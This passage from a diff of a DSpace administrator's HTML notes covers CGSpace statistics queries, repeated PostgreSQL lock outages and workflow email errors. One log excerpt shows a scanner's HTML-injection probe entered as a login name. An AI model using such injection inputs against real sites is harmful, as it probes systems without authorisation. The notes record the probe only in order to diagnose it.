+</span></span><span style="display:flex;"><span>  sed &#39;1d&#39; | \
+</span></span><span style="display:flex;"><span>  sort | \
+</span></span><span style="display:flex;"><span>  uniq
+</span></span></code></pre></div><ul>
+<li>So I remember in the future, this basically does the following:
+<ul>
+<li>Use csvcut to extract the id and all date issued columns from the CSV</li>
+<li>Use sed to remove the header so we can refer to the columns using default a, b, c instead of their real names (which are tricky to match due to special characters)</li>
+<li>Use csvsql to concatenate the various date issued columns (coalescing where null)</li>
+<li>Use csvgrep to filter items by date issued in 2020</li>
+<li>Use csvcut to extract the id column</li>
+<li>Use sed to delete the header row</li>
+<li>Use sort and uniq to filter out any duplicate IDs (there were three)</li>
+</ul>
+</li>
+<li>Then I have a list of 296 IDs for RTB items issued in 2020</li>
+<li>I constructed a JSON file to post to the DSpace Statistics API:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;limit&#34;</span>: <span style="color:#ae81ff">100</span>,
+</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;page&#34;</span>: <span style="color:#ae81ff">0</span>,
+</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;dateFrom&#34;</span>: <span style="color:#e6db74">&#34;2020-01-01T00:00:00Z&#34;</span>,
+</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;dateTo&#34;</span>: <span style="color:#e6db74">&#34;2020-12-31T00:00:00Z&#34;</span>,
+</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;items&#34;</span>: [
+</span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;00358715-b70c-4fdd-aa55-730e05ba739e&#34;</span>,
+</span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;004b54bb-f16f-4cec-9fbc-ab6c6345c43d&#34;</span>,
+</span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;02fb7630-d71a-449e-b65d-32b4ea7d6904&#34;</span>,
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">...</span>
+</span></span><span style="display:flex;"><span>  ]
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>Then I submitted the file three times (changing the page parameter):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp &gt; /tmp/page1.json
+</span></span><span style="display:flex;"><span>$ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp &gt; /tmp/page2.json
+</span></span><span style="display:flex;"><span>$ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp &gt; /tmp/page3.json
+</span></span></code></pre></div><ul>
+<li>Then I extracted the views and downloads in the most ridiculous way:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep views /tmp/page*.json | grep -o -E <span style="color:#e6db74">&#39;[0-9]+$&#39;</span> | sed <span style="color:#e6db74">&#39;s/,//&#39;</span> | xargs | sed -e <span style="color:#e6db74">&#39;s/ /+/g&#39;</span> | bc
+</span></span><span style="display:flex;"><span>30364
+</span></span><span style="display:flex;"><span>$ grep downloads /tmp/page*.json | grep -o -E <span style="color:#e6db74">&#39;[0-9]+,&#39;</span> | sed <span style="color:#e6db74">&#39;s/,//&#39;</span> | xargs | sed -e <span style="color:#e6db74">&#39;s/ /+/g&#39;</span> | bc
+</span></span><span style="display:flex;"><span>9100
+</span></span></code></pre></div><ul>
+<li>For curiousity I did the same exercise for items issued in 2019 and got the following:
+<ul>
+<li>Views: 30721</li>
+<li>Downloads: 10205</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-04-06">2021-04-06</h2>
+<ul>
+<li>Margarita from CCAFS was having problems deleting an item from CGSpace again
+<ul>
+<li>The error was &ldquo;Authorization denied for action OBSOLETE (DELETE) on BITSTREAM:bd157345-448e &hellip;&rdquo;</li>
+<li>This is the same issue as last month</li>
+</ul>
+</li>
+<li>Create a new collection on CGSpace for a new CIP project at Mishel Portilla&rsquo;s request</li>
+<li>I got a notice that CGSpace was down
+<ul>
+<li>I didn&rsquo;t see anything strange at first, but there are an insane amount of database connections:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>12413
+</span></span></code></pre></div><ul>
+<li>The system journal shows thousands of these messages in the system journal, this is the first one:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Apr 06 07:52:13 linode18 tomcat7[556]: Apr 06, 2021 7:52:13 AM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
+</span></span></code></pre></div><ul>
+<li>Around that time in the dspace log I see nothing unusual, but maybe these?</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-04-06 07:52:29,409 INFO  com.atmire.dspace.cua.CUASolrLoggerServiceImpl @ Updating : 200/127 docs in http://localhost:8081/solr/statistics
+</span></span></code></pre></div><ul>
+<li>(BTW what is the deal with the &ldquo;200/127&rdquo;? I should send a comment to Atmire)
+<ul>
+<li>I file a ticket with Atmire: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-tickets">https://tracker.atmire.com/tickets-cgiar-ilri/view-tickets</a></li>
+</ul>
+</li>
+<li>I restarted the PostgreSQL and Tomcat services and now I see less connections, but still WAY high:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>3640
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>2968
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>13
+</span></span></code></pre></div><ul>
+<li>After ten minutes or so it went back down&hellip;</li>
+<li>And now it&rsquo;s back up in the thousands&hellip; I am seeing a lot of stuff in dspace log like this:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-04-06 11:59:34,364 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717951
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717952
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717953
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717954
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717955
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717956
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717957
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717958
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717959
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717960
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717961
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717962
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717963
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717964
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717965
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717966
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717967
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717968
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717969
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717970
+</span></span><span style="display:flex;"><span>2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717971
+</span></span></code></pre></div><ul>
+<li>I sent some notes and a log to Atmire on our existing issue about the database stuff
+<ul>
+<li>Also I asked them about the possibility of doing a formal review of Hibernate</li>
+</ul>
+</li>
+<li>Falcon 3.0.0 was released so I updated the 3.0.0 branch for dspace-statistics-api and merged it to <code>v6_x</code>
+<ul>
+<li>I also fixed one minor (unrelated) bug in the tests</li>
+<li>Then I deployed the new version on DSpace Test</li>
+</ul>
+</li>
+<li>I had a meeting with Peter and Abenet about CGSpace TODOs</li>
+<li>CGSpace went down again and the PostgreSQL locks are through the roof:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>12154
+</span></span></code></pre></div><ul>
+<li>I don&rsquo;t see any activity on REST API, but in the last four hours there have been 3,500 DSpace sessions:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep -a -E <span style="color:#e6db74">&#39;2021-04-06 (13|14|15|16|17):&#39;</span> /home/cgspace.cgiar.org/log/dspace.log.2021-04-06 | grep -o -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>3547
+</span></span></code></pre></div><ul>
+<li>I looked at the same time of day for the past few weeks and it seems to be a normal number of sessions:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># <span style="color:#66d9ef">for</span> file in /home/cgspace.cgiar.org/log/dspace.log.2021-0<span style="color:#f92672">{</span>3,4<span style="color:#f92672">}</span>-*; <span style="color:#66d9ef">do</span> grep -a -E <span style="color:#e6db74">&#34;2021-0(3|4)-[0-9]{2} (13|14|15|16|17):&#34;</span> <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span> | grep -o -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}&#39;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>3572
+</span></span><span style="display:flex;"><span>4085
+</span></span><span style="display:flex;"><span>3476
+</span></span><span style="display:flex;"><span>3128
+</span></span><span style="display:flex;"><span>2949
+</span></span><span style="display:flex;"><span>2016
+</span></span><span style="display:flex;"><span>1839
+</span></span><span style="display:flex;"><span>4513
+</span></span><span style="display:flex;"><span>3463
+</span></span><span style="display:flex;"><span>4425
+</span></span><span style="display:flex;"><span>3328
+</span></span><span style="display:flex;"><span>2783
+</span></span><span style="display:flex;"><span>3898
+</span></span><span style="display:flex;"><span>3848
+</span></span><span style="display:flex;"><span>7799
+</span></span><span style="display:flex;"><span>255
+</span></span><span style="display:flex;"><span>534
+</span></span><span style="display:flex;"><span>2755
+</span></span><span style="display:flex;"><span>599
+</span></span><span style="display:flex;"><span>4463
+</span></span><span style="display:flex;"><span>3547
+</span></span></code></pre></div><ul>
+<li>What about total number of sessions per day?</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># <span style="color:#66d9ef">for</span> file in /home/cgspace.cgiar.org/log/dspace.log.2021-0<span style="color:#f92672">{</span>3,4<span style="color:#f92672">}</span>-*; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">:&#34;</span>; grep -a -o -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}&#39;</span> <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>/home/cgspace.cgiar.org/log/dspace.log.2021-03-28:
+</span></span><span style="display:flex;"><span>11784
+</span></span><span style="display:flex;"><span>/home/cgspace.cgiar.org/log/dspace.log.2021-03-29:
+</span></span><span style="display:flex;"><span>15104
+</span></span><span style="display:flex;"><span>/home/cgspace.cgiar.org/log/dspace.log.2021-03-30:
+</span></span><span style="display:flex;"><span>19396
+</span></span><span style="display:flex;"><span>/home/cgspace.cgiar.org/log/dspace.log.2021-03-31:
+</span></span><span style="display:flex;"><span>32612
+</span></span><span style="display:flex;"><span>/home/cgspace.cgiar.org/log/dspace.log.2021-04-01:
+</span></span><span style="display:flex;"><span>26037
+</span></span><span style="display:flex;"><span>/home/cgspace.cgiar.org/log/dspace.log.2021-04-02:
+</span></span><span style="display:flex;"><span>14315
+</span></span><span style="display:flex;"><span>/home/cgspace.cgiar.org/log/dspace.log.2021-04-03:
+</span></span><span style="display:flex;"><span>12530
+</span></span><span style="display:flex;"><span>/home/cgspace.cgiar.org/log/dspace.log.2021-04-04:
+</span></span><span style="display:flex;"><span>13138
+</span></span><span style="display:flex;"><span>/home/cgspace.cgiar.org/log/dspace.log.2021-04-05:
+</span></span><span style="display:flex;"><span>16756
+</span></span><span style="display:flex;"><span>/home/cgspace.cgiar.org/log/dspace.log.2021-04-06:
+</span></span><span style="display:flex;"><span>12343
+</span></span></code></pre></div><ul>
+<li>So it&rsquo;s not the number of sessions&hellip; it&rsquo;s something with the workload&hellip;</li>
+<li>I had to step away for an hour or so and when I came back the site was still down and there were still 12,000 locks
+<ul>
+<li>I restarted postgresql and tomcat7&hellip;</li>
+</ul>
+</li>
+<li>The locks in PostgreSQL shot up again&hellip;</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>3447
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>3527
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>4582
+</span></span></code></pre></div><ul>
+<li>I don&rsquo;t know what the hell is going on, but the PostgreSQL connections and locks are way higher than ever before:</li>
+</ul>
+<p><img src="/cgspace-notes/2021/04/postgres_connections_cgspace-week.png" alt="PostgreSQL connections week">
+<img src="/cgspace-notes/2021/04/postgres_locks_cgspace-week.png" alt="PostgreSQL locks week">
+<img src="/cgspace-notes/2021/04/jmx_tomcat_dbpools-week.png" alt="Tomcat database pool"></p>
+<ul>
+<li>Otherwise, the number of DSpace sessions is completely normal:</li>
+</ul>
+<p><img src="/cgspace-notes/2021/04/jmx_dspace_sessions-week.png" alt="DSpace sessions"></p>
+<ul>
+<li>While looking at the nginx logs I see that MEL is trying to log into CGSpace&rsquo;s REST API and delete items:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>34.209.213.122 - - [06/Apr/2021:03:50:46 +0200] &#34;POST /rest/login HTTP/1.1&#34; 401 727 &#34;-&#34; &#34;MEL&#34;
+</span></span><span style="display:flex;"><span>34.209.213.122 - - [06/Apr/2021:03:50:48 +0200] &#34;DELETE /rest/items/95f52bf1-f082-4e10-ad57-268a76ca18ec/metadata HTTP/1.1&#34; 401 704 &#34;-&#34; &#34;-&#34;
+</span></span></code></pre></div><ul>
+<li>I see a few of these per day going back several months
+<ul>
+<li>I sent a message to Salem and Enrico to ask if they know</li>
+</ul>
+</li>
+<li>Also annoying, I see tons of what look like penetration testing requests from Qualys:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-04-04 06:35:17,889 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:no DN found for user &#34;&#39;&gt;&lt;qss a=X158062356Y1_2Z&gt;
+</span></span><span style="display:flex;"><span>2021-04-04 06:35:17,889 INFO  org.dspace.authenticate.PasswordAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:authenticate:attempting password auth of user=&#34;&#39;&gt;&lt;qss a=X158062356Y1_2Z&gt;
+</span></span><span style="display:flex;"><span>2021-04-04 06:35:17,890 INFO  org.dspace.app.xmlui.utils.AuthenticationUtil @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:email=&#34;&#39;&gt;&lt;qss a=X158062356Y1_2Z&gt;, realm=null, result=2
+</span></span><span style="display:flex;"><span>2021-04-04 06:35:18,145 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:auth:attempting trivial auth of user=was@qualys.com
+</span></span><span style="display:flex;"><span>2021-04-04 06:35:18,519 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:no DN found for user was@qualys.com
+</span></span><span style="display:flex;"><span>2021-04-04 06:35:18,520 INFO  org.dspace.authenticate.PasswordAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:authenticate:attempting password auth of user=was@qualys.com
+</span></span></code></pre></div><ul>
+<li>I deleted the ilri/AReS repository on GitHub since we haven&rsquo;t updated it in two years
+<ul>
+<li>All development is happening in <a href="https://github.com/ilri/openRXV">https://github.com/ilri/openRXV</a> now</li>
+</ul>
+</li>
+<li>10PM and the server is down again, with locks through the roof:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>12198
+</span></span></code></pre></div><ul>
+<li>I see that there are tons of PostgreSQL connections getting abandoned today, compared to very few in the past few weeks:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ journalctl -u tomcat7 --since<span style="color:#f92672">=</span>today | grep -c <span style="color:#e6db74">&#39;ConnectionPool abandon&#39;</span>
+</span></span><span style="display:flex;"><span>1838
+</span></span><span style="display:flex;"><span>$ journalctl -u tomcat7 --since<span style="color:#f92672">=</span>2021-03-20 --until<span style="color:#f92672">=</span>2021-04-05 | grep -c <span style="color:#e6db74">&#39;ConnectionPool abandon&#39;</span>
+</span></span><span style="display:flex;"><span>3
+</span></span></code></pre></div><ul>
+<li>I even restarted the server and connections were low for a few minutes until they shot back up:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>13
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>8651
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>8940
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>10504
+</span></span></code></pre></div><ul>
+<li>I had to go to bed and I bet it will crash and be down for hours until I wake up&hellip;</li>
+<li>What the hell is this user agent?</li>
+</ul>
+<pre tabindex="0"><code>54.197.119.143 - - [06/Apr/2021:19:18:11 +0200] &#34;GET /handle/10568/16499 HTTP/1.1&#34; 499 0 &#34;-&#34; &#34;GetUrl/1.0 wdestiny@umich.edu (Linux)&#34;
+</code></pre><h2 id="2021-04-07">2021-04-07</h2>
+<ul>
+<li>CGSpace was still down from last night of course, with tons of database locks:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>12168
+</span></span></code></pre></div><ul>
+<li>I restarted the server again and the locks came back</li>
+<li>Atmire responded to the message from yesterday
+<ul>
+<li>The noticed something in the logs about emails failing to be sent</li>
+<li>There appears to be an issue sending mails on workflow tasks when a user in that group has an invalid email address:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-04-01 12:45:11,414 WARN  org.dspace.workflowbasic.BasicWorkflowServiceImpl @ a.akwarandu@cgiar.org:session_id=2F20F20D4A8C36DB53D42DE45DFA3CCE:notifyGroupofTask:cannot email user group_id=aecf811b-b7e9-4b6f-8776-3d372e6a048b workflow_item_id=33085\colon;  Invalid Addresses (com.sun.mail.smtp.SMTPAddressFailedException\colon; 501 5.1.3 Invalid address
+</span></span></code></pre></div><ul>
+<li>The issue is not the named user above, but a member of the group&hellip;</li>
+<li>And the group does have users with invalid email addresses (probably accounts created automatically after authenticating with LDAP):</li>
+</ul>
+<p><img src="/cgspace-notes/2021/04/group-invalid-email.png" alt="DSpace group"></p>
+<ul>
+<li>I extracted all the group IDs from recent logs that had users with invalid email addresses:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -a -E <span style="color:#e6db74">&#39;email user group_id=\b[0-9a-f]{8}\b-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-\b[0-9a-f]{12}\b&#39;</span> /home/cgspace.cgiar.org/log/dspace.log.* | grep -o -E <span style="color:#e6db74">&#39;\b[0-9a-f]{8}\b-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-\b[0-9a-f]{12}\b&#39;</span> | sort | uniq
+</span></span><span style="display:flex;"><span>0a30d6ae-74a6-4eee-a8f5-ee5d15192ee6
+</span></span><span style="display:flex;"><span>1769137c-36d4-42b2-8fec-60585e110db7
+</span></span><span style="display:flex;"><span>203c8614-8a97-4ac8-9686-d9d62cb52acc
+</span></span><span style="display:flex;"><span>294603de-3d09-464e-a5b0-09e452c6b5ab
+</span></span><span style="display:flex;"><span>35878555-9623-4679-beb8-bb3395fdf26e
+</span></span><span style="display:flex;"><span>3d8a5efa-5509-4bf9-9374-2bc714aceb99
+</span></span><span style="display:flex;"><span>4238208a-f848-47cb-9dd2-43f9f954a4af
+</span></span><span style="display:flex;"><span>44939b84-1894-41e7-b3e6-8c8d1781057b
+</span></span><span style="display:flex;"><span>49ba087e-75a3-45ce-805c-69eeda0f786b
+</span></span><span style="display:flex;"><span>4a6606ce-0284-421d-bf80-4dafddba2d42
+</span></span><span style="display:flex;"><span>527de6aa-9cd0-4988-bf5f-c9c92ba2ac10
+</span></span><span style="display:flex;"><span>54cd1b16-65bf-4041-9d84-fb2ea3301d6d
+</span></span><span style="display:flex;"><span>58982847-5f7c-4b8b-a7b0-4d4de702136e
